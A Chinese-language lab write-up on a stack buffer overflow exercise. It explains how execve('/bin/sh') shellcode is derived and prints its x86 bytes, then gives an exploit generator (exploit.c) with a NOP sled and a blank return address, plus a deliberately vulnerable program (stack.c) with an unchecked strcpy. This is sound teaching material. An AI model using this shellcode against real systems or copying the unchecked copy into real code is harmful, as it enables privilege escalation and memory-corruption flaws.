缓冲区溢出-shellcode分析

实验楼项目
shellcode结果就是调用出一个shell
这里的过程是先用exploit生成一个恶意文件，其中有溢出代码（汇编形式）
该文件内容:
12字节空 2字节文件装入内存的地址码，72字节空，然后为shellcode代码和空。
当stack的bug程序运行时，return的地址被覆盖为shellcode的地址，获取权限。

#include <stdio.h>int main( ) {char *name[2];name[0] = ‘‘/bin/sh’’;name[1] = NULL;execve(name[0], name, NULL);}

//生成汇编码gcc -o shellcode -ggdb -static shellcode.cgdb shellcodedisassemble main//结果"\x31\xc0\x50\x68"//sh"\x68"/bin"\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"

生成恶意文件程序exploit

/* exploit.c *//* A program that creates a file containing code for launching shell*/#include <stdlib.h>#include <stdio.h>#include <string.h>char shellcode[]="\x31\xc0"    //xorl %eax,%eax"\x50"        //pushl %eax"\x68""//sh"  //pushl $0x68732f2f"\x68""/bin"  //pushl $0x6e69622f"\x89\xe3"    //movl %esp,%ebx"\x50"        //pushl %eax"\x53"        //pushl %ebx"\x89\xe1"    //movl %esp,%ecx"\x99"        //cdq"\xb0\x0b"    //movb $0x0b,%al"\xcd\x80"    //int $0x80;void main(int argc, char **argv){    char buffer[517];    FILE *badfile;    /* Initialize buffer with 0x90 (NOP instruction) */    memset(&buffer, 0x90, 517);    /* You need to fill the buffer with appropriate contents here */    strcpy(buffer,"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x??\x??\x??\x??");    strcpy(buffer+100,shellcode);    /* Save the contents to the file "badfile" */    badfile = fopen("./badfile", "w");    fwrite(buffer, 517, 1, badfile);    fclose(badfile);}

有bug的程序stack.c

/* stack.c *//* This program has a buffer overflow vulnerability. *//* Our task is to exploit this vulnerability */#include <stdlib.h>#include <stdio.h>#include <string.h>int bof(char *str){    char buffer[12];/* The following statement has a buffer overflow problem */    strcpy(buffer, str);    return 1;}int main(int argc, char **argv){    char str[517];    FILE *badfile;    badfile = fopen("badfile", "r");    fread(str, sizeof(char), 517, badfile);    bof(str);    printf("Returned Properly\n");    return 1;}